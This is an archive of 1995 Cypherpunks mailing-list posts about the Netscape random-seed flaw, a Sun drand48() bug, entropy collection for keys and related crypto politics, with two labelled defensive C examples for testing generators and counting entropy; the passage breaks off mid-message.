MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

jws@neon.netscape.com writes:
> Most of the unix machines do the same thing.  On SGI machines
> that have the hardware cycle counter, its value is used in place of the
> srand48(usec), lrand48() sequence.  On BSDI the code used srandom and random.


Kun Luo, one of our grad students here, recently found a bug in Sun's
implementation of the drand48() function.  We reported it to Sun, and they
acknowledged the bug exists - it seemed to be the first time they had heard
of it, though.  The bug affects Sun's ANSI C compiler shipped with
SPARCWorks3.0 and consists of the following:  If you're compiling using the
-Xc flag (strict ANSI C, no SUN C compatibility extensions), the function
drand48() is BROKEN.  It ALWAYS returns the number 9.000000, no matter what
you seeded it with using srand48().

To reproduce, compile the following program under Solaris 2.x using their
C compiler AND the -Xc flag:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <time.h>

/* Seed from the clock, then print 1000 values returned by drand48(). */
int main(void){
   double number;
   int  num = 1000;

   srand48((int)time(NULL));
   while(num--){
        number = drand48();
        printf("%f\n", number);
   }
   return 0;
}

By the way, Cypherpunks mail seems to indicate that Netscape uses lrand48()
instead of drand48().  lrand48() is NOT broken.  The potential for disaster
is high, though, for anyone blindly trusting vendor-provided pseudo-
random number generators.  How many products are out there using drand48()
as part of their random number generation scheme?

-Arve
 
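
[Added example, not part of the post and not Sun's code.] A start-up self-test in C that a program can run on a vendor-provided generator before relying on it, catching output outside [0, 1), a stuck value, poor spread, or a seed that has no effect. The enum, the function names and the broken stand-in generators are hypothetical.

```c
#include <stddef.h>
#include <stdio.h>

/* drand48() and srand48() are POSIX, not ISO C. They are declared here so
 * that the calls below always see a prototype, even when a strict ISO mode
 * hides them in <stdlib.h>. */
double drand48(void);
void srand48(long seedval);

enum rng_fault {
    RNG_OK = 0, RNG_OUT_OF_RANGE, RNG_STUCK, RNG_LOW_SPREAD, RNG_IGNORES_SEED
};

typedef double (*rng_next_fn)(void);
typedef void (*rng_seed_fn)(long);

/* Constructed stand-ins for broken generators, used to exercise the test. */
double stuck_at_nine(void) { return 9.0; }  /* the symptom in the post */
double stuck_at_half(void) { return 0.5; }
void seed_ignored(long seed) { (void)seed; }

/* Draw n values (at least 64) and report the first fault found.
 * The test reseeds the generator, so the caller must seed it again
 * afterwards before real use. */
enum rng_fault rng_selftest(rng_seed_fn seed, rng_next_fn next, size_t n)
{
    double v, first = 0.0, lo = 1.0, hi = 0.0, a, b, c;
    size_t i, same = 0;

    if (n < 64)
        n = 64;            /* too few draws make the spread check noisy */
    seed(1L);
    for (i = 0; i < n; i++) {
        v = next();
        if (!(v >= 0.0 && v < 1.0))       /* also rejects NaN */
            return RNG_OUT_OF_RANGE;
        if (i == 0)
            first = v;
        if (v == first)
            same++;
        if (v < lo) lo = v;
        if (v > hi) hi = v;
    }
    if (same == n)
        return RNG_STUCK;
    /* A uniform generator misses either quarter of the range in n draws
     * with probability 0.75^n, about 1e-8 for n = 64. */
    if (lo >= 0.25 || hi <= 0.75)
        return RNG_LOW_SPREAD;
    /* Same seed must repeat the output; a different seed must change it. */
    seed(1L); a = next();
    seed(1L); b = next();
    seed(2L); c = next();
    if (a != b || a == c)
        return RNG_IGNORES_SEED;
    return RNG_OK;
}

int main(void)
{
    printf("drand48:       fault %d\n",
           (int)rng_selftest(srand48, drand48, 1000));
    printf("stuck_at_nine: fault %d\n",
           (int)rng_selftest(seed_ignored, stuck_at_nine, 1000));
    return 0;
}
```

Passing the test shows only that the generator is not grossly broken; it says nothing about whether its output is unpredictable enough for keys.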



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 20 Sep 95 07:40:46 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: USA Today on Fear of Credit Cards over Net
Message-ID: <9509201440.AA28932@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


USA Today reports in its 9/20/95 edition, on the front of the Money section,
that "Few Feel Safe Making On-Line Transactions". A survey of 427 "computer
users" by USA Today and Intelliquest yielded the results below. 

[The article doesn't say whether the survey was conducted before or after 
news of the bad seeds hit. <sigh>. I only bought USA Today because my best 
friend gets her 15 minutes of fame below the fold on page 7D of the Life 
section today.]

I'm not sure exactly what "sending a credit-card number to a commercial on-
line service" means. Apparently it's seen as slightly safer than phoning it
in, but much riskier than snail-mailing it in to an ISP. 

	How much do PC users trust:

	Automatic teller machines                                     77%
	Banking by phone                                              62%
	Banking by computer                                           57%
	Using a credit card or calling card at a public phone         57%
	Writing a credit-card number on a catalog order form          43%
	Sending a credit-card number to a commercial on-line service  34%
	Giving a credit-card number over the phone                    31%
	Sending a credit-card number over the Internet                 5%

	(margin of error = +/- 4.7%)

Raph also gets mentioned, mainly for "human interest" I'm afraid :/

	Even those familiar with the Internet do not routinely use it for
	financial transactions. Raph Levien -- a computer science Ph.D.
	candidate reached via Internet -- says he has only used his credit
	card once over the Internet. About a year ago, he bought three CDs:
	Best of Alan Parsons Project, Enya and Beethoven's Ninth. Levien is
	a member of the group cypherpunks, which announced on-line Sunday
	night that hackers found the security flaw in Netscape's software.
	Still, Levien says Netscape's system "is among the safest that
	there is."

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Wed, 20 Sep 95 10:51:33 PDT
To: cypherpunks@toad.com
Subject: Re: RSA Prevails In Arbitration Against Cylink
Message-ID: <v02110109ac860393cd56@[204.179.132.1]>
MIME-Version: 1.0
Content-Type: text/plain


Is there an electronic copy of the Arbitration Panel's precise ruling
available? No quicker way to end the PR confusion than to read the Real
Thing(tm).

Erik






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Wed, 20 Sep 95 09:48:46 PDT
To: cypherpunks@toad.com
Subject: Re: My Day
In-Reply-To: <199509201411.JAA04860@khijol>
Message-ID: <199509201648.KAA11790@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Ed Carp writes:

> Also add that many people seem to tend to swirl the mouse in fast circles,
> where there isn't *any* latency between mouse movements, and you get even
> less entropy.  I suspect that Colin Plumb's code, while a nice try, would
> be a bit less useful than might have been otherwise suspected.

Colin's code, independent of implementation, simply uses MD5 as a block
cipher to "launder" bit-streams that contain non-uniform distributions of
true random data. See "Truly Random Numbers" in Dr. Dobb's Journal, November 
1994,  p. 113. How much entropy you get out depends entirely on what you
feed in. 

I've put my code up on the cypherpunks ftp site, but I'm still waiting to
hear back from the site maintainers as to its final location. In any case,
that code uses the mouse _position_ and system timings in microseconds as
input to the MD5 engine. So swirling the mouse should provide a good source
of random input, better the faster it's moved. 

However, any code that generates random session keys should properly include
routines to estimate the amount of entropy collected, and not generate a
128-bit key until at least 128 bits of entropy have been fed into the pool.
This is a non-trivial problem, although PGP makes a good stab at it. To my
knowledge, CryptDisk does not include this feature, and really ought to. For
my own purposes in Curve Encrypt, this is not necessary, since I don't 
generate session keys, only salts.

                                   -- Will
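
[Added example, not part of the post and not code from PGP, CryptDisk, Curve Encrypt or Colin Plumb's randpool.] The entropy accounting the last paragraph asks for, in C: event timings are credited conservatively and a 128-bit key is refused until 128 bits have been credited. The delta-based estimator, the 8-bit cap per event and all names are assumptions of this example; mixing the samples into the pool (MD5 in the post) is outside its scope.

```c
#include <stdint.h>
#include <stdio.h>

#define KEY_BITS           128u /* session key size named in the post */
#define MAX_BITS_PER_EVENT   8u /* assumed cap on credit for one event */

struct entropy_meter {
    uint64_t last_time;      /* timestamp of the previous event, in usec */
    int64_t  last_delta;     /* previous first-order difference */
    int64_t  last_delta2;    /* previous second-order difference */
    unsigned events;         /* events seen so far */
    unsigned credited_bits;  /* conservative running estimate */
};

static uint64_t magnitude(int64_t v)
{
    return v < 0 ? (uint64_t)0 - (uint64_t)v : (uint64_t)v;
}

static unsigned bit_length(uint64_t v)
{
    unsigned n = 0;
    while (v != 0) { n++; v >>= 1; }
    return n;
}

void meter_init(struct entropy_meter *m)
{
    *m = (struct entropy_meter){0};
}

/* Account for one input event (mouse move, keystroke) stamped t_usec.
 * Credit is based on the smallest of the first, second and third order
 * timing differences, so evenly spaced events (delta2 == 0) earn nothing.
 * Returns the bits credited for this event. */
unsigned meter_add_event(struct entropy_meter *m, uint64_t t_usec)
{
    int64_t delta = 0, delta2 = 0, delta3;
    uint64_t smallest;
    unsigned bits = 0;

    if (m->events >= 1) delta = (int64_t)(t_usec - m->last_time);
    if (m->events >= 2) delta2 = delta - m->last_delta;
    if (m->events >= 3) {
        delta3 = delta2 - m->last_delta2;
        smallest = magnitude(delta);
        if (magnitude(delta2) < smallest) smallest = magnitude(delta2);
        if (magnitude(delta3) < smallest) smallest = magnitude(delta3);
        bits = bit_length(smallest >> 1);
        if (bits > MAX_BITS_PER_EVENT) bits = MAX_BITS_PER_EVENT;
    }
    m->last_time = t_usec;
    m->last_delta = delta;
    m->last_delta2 = delta2;
    m->events++;
    m->credited_bits += bits;
    return bits;
}

/* Gate for key generation: succeed only when at least `bits` have been
 * credited, and debit them so the same input is never counted twice.
 * Returns 0 if the caller may draw the key from the pool, -1 if not. */
int meter_claim(struct entropy_meter *m, unsigned bits)
{
    if (m->credited_bits < bits)
        return -1;
    m->credited_bits -= bits;
    return 0;
}

/* Feed n events whose gaps cycle through gaps[0..ngaps-1], starting at
 * time 0 (call once per meter). Returns the total credit afterwards. */
unsigned meter_feed(struct entropy_meter *m, const uint32_t *gaps,
                    size_t ngaps, size_t n)
{
    uint64_t t = 0;
    size_t i;
    for (i = 0; i < n; i++) {
        meter_add_event(m, t);
        t += gaps[i % ngaps];
    }
    return m->credited_bits;
}

int main(void)
{
    /* Constructed sample gaps in microseconds, not measured data. */
    static const uint32_t even[] = {1000};
    static const uint32_t uneven[] = {1000, 1900, 1300, 2600, 1100, 2200};
    struct entropy_meter a, b;

    meter_init(&a);
    meter_init(&b);
    printf("even: %u bits, uneven: %u bits\n",
           meter_feed(&a, even, 1, 1000), meter_feed(&b, uneven, 6, 19));
    printf("128-bit key allowed: %s\n", meter_claim(&b, KEY_BITS) ? "no" : "yes");
    return 0;
}
```

The uneven sample is periodic and still earns full credit, which is why an estimate of this kind is capped and treated as a rough guide rather than a measurement.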

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 20 Sep 95 03:50:32 PDT
To: cypherpunks@toad.com
Subject: Re: SSL implementation problem at Netscape
In-Reply-To: <43kki8$os7@charm.magnus.acs.ohio-state.edu>
Message-ID: <43ork2$70f@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <43o47v$fsd@cnn.Princeton.EDU>, dawagner@flagstaff.princeton.edu (David A. Wagner) writes:
> In article <david-1909951219130001@192.0.2.1> from sci.crypt,
> David Sternlight <david@sternlight.com> wrote:
> > If the above is, in fact, accurate it appears to apply to previous
> > versions of Netscape, not the 2.0 versions for which the public beta goes
> > out next week.
> 
> We haven't tried it on v2.0, as we only have a copy of v1.1 right now.
> But the front-page New York Times article today said that the next version
> also has the same flaw, and that it'll be fixed before release.

  First off, Sternlight is not an agent working for netscape.  :-)

  The same fix that will be going out to patch old versions will be applied
to 2.0 before we do a public beta.  As with any code it will be refined
as necessary before the final release of 2.0.

[ stuff deleted ]

> While we don't yet know exactly how long it would take to break Netscape's
> PRNG in this threat model, I think it's clear that Netscape's current
> implementation is insufficient and insecure.

  Agreed.  See other messages of mine for a more detailed response.

> We don't know about e.g. PC's yet -- this is another area we were still
> working on.  I will note that Netscape didn't try to claim that any version
> was safe from this flaw, for what that's worth...

  Again, see my other messages on this and related topics for more details
of what the code was doing on PC and Mac.

> Hopefully this will be quickly fixed by Netscape, and then we can all stop
> worrying about it! :-)

  Yup.  Then I can get back to working only 16 hours a day.  :-)

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 20 Sep 95 10:43:54 PDT
To: cypherpunks@toad.com
Subject: Re: Cypherpunks Press release
Message-ID: <ac85a0d02f0210048d00@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:28 PM 9/20/95, Dietrich J. Kappe wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>We've seen the word "hacker" kicked around rather arbitrarily in the press.
>Are we to conclude that the cypherpunks are a bunch of hackers? I think it's
>time for some cypherpunks spin. How about a logo *and* a press release? The
>press release would give contacts (email, phone, etc.) so that someone on
>this list would be contacted by journalists when a crypto story breaks.
>
>If we get enough volunteers, we can fax blanket every newspaper, station,
>and network in the world.

I was of course being facetious about the putative "Cypherpunks logo."
Sorry I did not insert smileys.

The problem with the "Cypherpunks press release" notion is this:

-- we are an effective anarchy.

-- there is no "spokespunk" and no foreseeable way of choosing one.

Some people seem to _want_ some kind of central contact organization or
point, some place to lobby, buy advertising, send faxes, give press
conferences, etc.

But I don't see it happening.

Individuals and their organizations are free of course to do as they wish,
but if they claim to speak for "the Cypherpunks," they'll be out of line.

We are not a direct democracy, nor even are we a representative democracy.
No board of directors, etc.

While this undeniably affects how "messages" get out, that's life. There
are plenty of organizations with Washington offices, and with spokesmen
available for comment. But they don't have what we have.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Wed, 20 Sep 95 11:04:34 PDT
To: cypherpunks@toad.com
Subject: Announce: Private Idaho beta release
Message-ID: <199509201802.LAA10836@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I've finally gotten some time to incorporate a few new features/bug fixes
into Private Idaho (Windows remailer/PGP front-end).  The 2.5b4 release now
incorporates an easy interface to the alpha.c2.org nym server.  Also, simple
scripting is available for moving messages to e-mail apps that don't support
sequential header tabbing (Free Agent, Netscape, etc.).

The next available block of time will likely be devoted to incorporating
background POP3 scanning and downloading of PGP messages.

http://www.eskimo.com/~joelm - for your downloading please...

Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP
Thomas Jefferson used strong crypto, shouldn't you?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 20 Sep 95 11:17:18 PDT
To: cypherpunks@toad.com
Subject: Re: Munitions shirt (again)
Message-ID: <ac85a2df3002100408ee@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:49 PM 9/20/95, Ian Goldberg wrote:
>So, Dave and I got free munitions shirts (they're different, though;
>the font is smaller and they have a bunch of X'd out Constitutional
>Amendments on the back; I think they were designed by Joel Furr) for
>our bug find.
>
>So I'm wearing it today.  The thing is, I live in International House,
>a residence that has 50% non-Americans.
>
>So, any consensus as to whether it's actually illegal to do so?  I
>remember some disagreement a few weeks ago that AFAIK wasn't resolved.

The _consensus_ here seems to be: "This t-shirt is illegal to wear in front
of non-Americans," judging by the comments here.

The _reality_ is quite different, I think, and the "this shirt is illegal"
hype is, in my opinion, just that, hyperbole. Even hyperbull, too.

Books and written articles containing crypto algorithms are _not_ illegal
for "furriners" to look at. The t-shirt contains at most a fuzzy printing
of an algorithm that has been widely printed in various books and in
articles in mailing lists like ours.

(I agree that there are some unresolved issues with ostensibly
machine-readable forms. The t-shirt is not machine-readable by any
plausible interpretation of machine-readable.)


>As far as I can tell, it's _technically_ illegal, but any LEO would be
>out of his mind to try to enforce it (it would have to be a Fed, too,
>wouldn't it?  Or can regular city cops get you for violating export
>restrictions?).

Ian did great work on the latest Netscape break, but this is just plain crazy.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 08:07:08 PDT
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: My Day
In-Reply-To: <9509201248.AA09892@alpha>
Message-ID: <199509201506.LAA05066@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike McNally writes:
> Also (and note that it's been a while since I've messed around with
> PC's, but since the "architecture" remains chained to an early-80's
> design I suspect they're still the same) the PC clock frequency is
> generally pretty low.

No, it isn't actually. You can get a microsecond timer out of it. The
clock interrupts occur only infrequently, but the clock chip itself
increments very very fast, and if you wanted microsecond timings of
keystrokes there are registers that will give you what you want.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 20 Sep 95 08:18:15 PDT
To: cypherpunks@toad.com
Subject: Re: Security Flaw Is Discovered In Software Used in Shopping
Message-ID: <v02120d1aac85dff6bc68@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Wed, 20 Sep 1995 10:47:24 -0400 (EDT)
From: Nathaniel Borenstein <nsb@nsb.fv.com>
To: www-buyinfo@allegra.att.com
Subject: Re: Security Flaw Is Discovered In Software Used in Shopping

Without belaboring the point too much, I think there are a few
conclusions that really ought to be drawn:

-- The world has never seen unbreakable encryption software, and almost
certainly never will.  Nothing that human beings ever build is perfect.

-- Any encryption-based scheme is only as strong as its weakest link.
Generally, you don't know what the weakest link will turn out to be.

-- Basing a global financial infrastructure on the unbreakability of a
certain algorithm or program is at best imprudent.  Bear in mind that
people as well respected as Dr. Adleman -- the "A" in RSA -- are hard at
work trying to figure out how, for example, to use massive parallelism
to break the basic algorithms of public key cryptography.

-- Keeping sensitive financial information completely off the net is
always best, whether or not you are using encryption.

For information on a safe, non-cryptographic alternative that has been
fully operational for nearly a year, with over 30,000 paying customers,
a growth rate featuring a six week doubling period, and NO break-ins to
date, check out http://www.fv.com.  -- Nathaniel
--------
Nathaniel S. Borenstein <nsb@fv.com>    |           When privacy is outlawed,
Chief Scientist, First Virtual Holdings |     only outlaws will have privacy!
FAQ & PGP key: nsb+faq@nsb.fv.com       | SUPPORT THE ZIMMERMANN DEFENSE FUND!

---VIRTUAL YELLOW RIBBON-->> zldf@clark.net <http://www.netresponse.com/zldf>
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 20 Sep 95 08:22:32 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: USA Today on Fear of Credit Cards over Net
Message-ID: <199509201518.LAA78249@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

<snip>

>	How much do PC users trust:
>
>	Automatic teller machines                                     77%
>	Banking by phone                                              62%
>	Banking by computer                                           57%
>	Using a credit card or calling card at a public phone         57%
>	Writing a credit-card number on a catalog order form          43%
>	Sending a credit-card number to a commercial on-line service  34%
>	Giving a credit-card number over the phone                    31%
>	Sending a credit-card number over the Internet                 5%
>
>	(margin of error = +/- 4.7%)

<snip>

Pity they didn't ask about, "Tossing a credit card slip/carbon
in the garbage." Dumpster-diving is still an effective, lo-tech
attack.
JMR


Regards, Jim Ray

 "Not everything that is faced can be changed, but nothing can be
        changed until it is faced."  --  James Baldwin
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Wed, 20 Sep 95 10:39:49 PDT
To: cypherpunks@toad.com
Subject: MacRandoms
Message-ID: <199509201739.LAA12651@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain




OK, to get my implementation of Colin's randpool code for the Macintosh,

ftp://ftp.csua.berkeley.edu/pub/cypherpunks/randomness/MacRandoms.sea.hqx

As a bonus, this also includes a nice 68K assembler implementation of MD5.
Enjoy.

                                  -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Wed, 20 Sep 95 08:52:51 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Time release crypto
In-Reply-To: <199509190930.CAA24047@ix.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.950920113427.10619I-100000@dorsai.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995, Bill Stewart wrote:

> Technology can't solve the problem, only help a bit; algorithms
> aren't timebound.  In particular, true security depends on only
> being able to decrypt if you have the correct information, and there's
> no way to create decryption information in the future from 
> encryption pieces you have now without being able to create the 
> same information now.

Some of the following is probably idiotically obvious, but to prevent an 
attack on such a time keeper, it could be tied in to the atomic clocks, 
it could poll several PC's and check their time... any significant major 
time change would be spotted immediately...  that is you couldn't possibly 
change the time on many machines at the same time without having physical 
access to all the machines, etc.  Altering the time on an atomic clock 
would be visible to just about everyone, etc.

This in no way would prevent an attacker from stealing the passphrase to 
the time signing service, so it wouldn't prevent anyone from issuing 
false keys.  But by using a hardware random generator the time keeping 
service could know if it issued a key or not by storing all the keys it 
issued previously.

This would achieve the following: even if a thief stole the key, with 
enough randomization, the stolen keys would show up as valid, but would 
not show up in the time server's database - which should be written to 
write-once-media such as worm, or CDROM, etc...  the stolen key would 
generate valid time signatures, but would not be on the database, so it 
would be clear it was forged.  To get around this, the bad guy would need 
constant physical access to the time keeper, not just a single black bag 
job.

This also means that this database must be publicly searchable at all 
times.  Perhaps the generator passphrase should also be changed randomly 
as time passes - but then these things too would have to be stored 
somewhere before the time the key expires...

This is probably a bit far fetched, but the time keeper could be tied 
into astronomical events - that is have it follow the path of planets, 
star systems, etc. and derive time that way and compare it with what 
time it thinks it is.  This would require quite a lot of sensors and 
extra hardware to track stars, planets, etc...   The bad guy would have 
to do a lot more work to get around this...  basically what you want to 
do is track some totally unalterable event to keep track of time, and we 
presume the NSA cannot change the orbits of planets... yet. ;-)


Another method would be to set up a key breaking system which would 
accept weaker keys - say 300 bits or so, and start breaking them.  This 
wouldn't guarantee they wouldn't be broken before such and such time, and 
wouldn't prevent anyone from running their own on faster hardware, or 
building special hardware optimized to break it faster though...  but 
without the private key, the only way to break it would be to brute force 
it.

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 20 Sep 95 11:58:55 PDT
To: cypherpunks@toad.com
Subject: netscape bug
Message-ID: <199509201855.LAA17261@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


clearly the netscape engineers did not practice "safe crypto programming",
but I question the seriousness of the crack.

none of the articles mention that the cracker must have login access
to the computer that the random numbers are generated on. is this true?
does the code require knowledge of the PID etc. that can only be obtained
by a login to the system that the netscape session is running on?

if this is true (i.e. login access required) this bug is by far not
as serious as some of the hyperbole is suggesting. I agree it is still
very insecure but the most dangerous crypto bugs are those where you
can determine keys from data alone.. physical penetration into a machine
is another level of security..

furthermore, I would like to commend Netscape for their fast response
to the problem and apparent commitment to establishing safeguards that
avoid it in the future.

cypherpunks have an easy time ridiculing someone who slit their throat
on writing some crypto functions, but geez, cut them some slack:
 crypto stuff has so many pitfalls and bugaboos that even the world-class 
experts make mistakes. where else can not properly "burning" stack 
registers (function parameters) and environment variables be considered 
"lethal"??? PGP errors have been reported on numerous 
occasions, some in the randomizer code. do people call for Zimmermann's
head on a stick and call him "incompetent"?

often when cryptographers say something is "broken" it can still mean
that it is not necessarily unsafe in practice. there are many shades
of "broken", some requiring a Cray and others requiring a PC. I am
really surprised how much people here consider "broken is broken". this
is only the extreme theoretical perspective. granted I am not advocating
that people *not*fix* bad crypto functions, I'm only saying that maybe
it's not in everyone's best interest to run around and say "the sky is
falling" and lambaste companies for minor difficulties..

Netscape is a world class product, and it's *free*. on this cypherpunks
list, I have seen no end to the venomous criticisms that people level at 
*free* products, which IMHO is quite tasteless at times. Netscape has
done far more for the cypherpunk cause than  many, many companies just
by including RC4 in their product. they have taken some heat for their
decisions & code, but they are on the front lines of battle. now instead of
our vague claims about how the world can benefit from good crypto, how
it is immensely valuable and important to cyberspatial financial transactions,
to promote the cypherpunk cause, we now have something *popular*, *physical*,
 and *tangible* to point to: netscape!!
this is *not* vaporware. this is not some cpunk saying, "all one needs
is [x] algorithm running on [y] network and you have a world class
infrastructure". the amount of work to get something like Netscape into
the world is quite daunting and herculean. we owe a great debt to netscape
and their accomplishments for furthering our own agenda!!! please do not 
trivialize what they have accomplished!! Netscape is here, it works, and
it is cyberspatial crypto that Joe Sixpack can understand and *use*!!
it is not a toy remailer, it is not some PGP front end, it is not some
mailer script, *this* is the format in which Joe Sixpack will be 
using crypto in the future, the format which will bring "crypto to the
unwashed masses"!!

Netscape may very well be the chief vehicle that puts on *concrete pressure*
on our government to relax crypto export laws. I see this happening 
*right now* with them going to a 64 bit key from a 40 bit one, and the
world starting to realize the importance of crypto and the idiocy of 
the export laws. I am really amazed at how few seem to be supporting
Netscape here and considering them the *premiere ally* in our current
battle. it reminds me of how much people here rant at Microsoft when 
virtually no other company on the planet could pull off what they make
look easy (ah, that's another story I've filled up other posts with).

please do *not* take an adversarial relationship with the companies
who are helping advance the cutting edge of cyberspace!! do *not*
ridicule them. rather, help them to understand their problems. I think
you will find that most companies are *not* hostile to improving their
software, and will readily admit it when it needs fixing (intel has
been humbled by their pentium glitch, and I doubt any company again will
ever be so obstinate and belligerent..) . 

I am willing to bet that the netscape bug would have been fixed quickly if it
had been quietly brought to their attention, without the blaring media
lights (I enjoy the media circus as much as the next guy, but on the
other hand, doing some things quietly may actually advance the cypherpunk
cause further than by making a noisy hullaballoo in cyberspace).

once again I commend Netscape for their fine software and willingness to
perfect it. netscape is at the cutting edge of advancing key cyberspace
technologies and it is not surprising that they make some minor mistakes
with the code in these early phases. cyberspace is very young!! give 
designers a bit of time to get it right. be patient!! do not accuse
them of incompetence!! netscape is tens of thousands of lines of 
world-class code. only in programming can a few moments of total,
rapt attention lead to bugs that get blared on the front page of
new york times and affect your stock price!! good lord, give the guys
a break.

cpunks: when Netscape has some serious competitors, they will get
their act together. but at the moment they are the only game in town,
and it will pay off to be nice to them, and try to support them, instead
of kicking them in the teeth and wringing them every time they make
a mistake. few in the world are as knowledgeable or paranoid as we are
about security, and it's going to be a gradual process to get to even
a fraction of the expertise here penetrating the mainstream software
industry. be patient!!

--

P.M. notes that anywhere there is a data-driven buffer overflow (which
he suspects are all over netscape) he can get code to execute anything
he wants. this reminds me of the
Morris internet worm that ran exactly the same way. it used a
bug in the finger demon that caused a string buffer overwrite
(via strcpy, instead of strncpy) to execute customized code.

my question: I have not seen the specifics of how this works. does
this require specialized knowledge of the native machine language on the 
host machine? or is it just used to cause something like a core dump
to get a command line or something like that?


--Vlad Nuri





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Wed, 20 Sep 95 09:05:53 PDT
To: cypherpunks@toad.com
Subject: Silly NetScape RND tricks...
Message-ID: <199509201605.MAA07035@libws3.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



I've only been skimming the NetScape-related posts lately, but I've yet
to see anyone mention using a keyboard-timing sampler as a source for
some random bits... I believe this is still a workable solution even in
Windows, though probably not as 'precise' as if it were run from DOS.

Any comments?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Wed, 20 Sep 95 09:10:09 PDT
To: cypherpunks@toad.com
Subject: Re: Cypherpunks Press release
In-Reply-To: <v01510106ac85ee814baa@[206.1.161.4]>
Message-ID: <199509201607.MAA19722@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 20, 10:28, Dietrich J. Kappe sent the following to the NSA's mail
archives:
> Subject: Cypherpunks Press release
|| -----BEGIN PGP SIGNED MESSAGE-----
||
|| We've seen the word "hacker" kicked around rather arbitrarily in the press.
|| Are we to conclude that the cypherpunks are a bunch of hackers? I think it's
|| time for some cypherpunks spin. How about a logo *and* a press release? The
|| press release would give contacts (email, phone, etc.) so that someone on
|| this list would be contacted by journalists when a crypto story breaks.
||
|| If we get enough volunteers, we can fax blanket every newspaper, station,
|| and network in the world.
||

I think it's a great idea, personally.  I think many journalists would like
